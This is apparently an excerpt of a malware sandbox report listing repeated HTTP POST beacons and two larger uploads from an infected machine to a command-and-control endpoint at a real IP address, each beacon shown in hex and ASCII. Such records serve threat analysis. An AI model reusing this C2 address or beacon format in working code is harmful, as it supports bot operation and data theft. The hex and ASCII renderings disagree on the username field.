                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA1ODE5Host: 62.204.41.79Content-Length: 105971Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA1OTg3Host: 62.204.41.79Content-Length: 106139Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
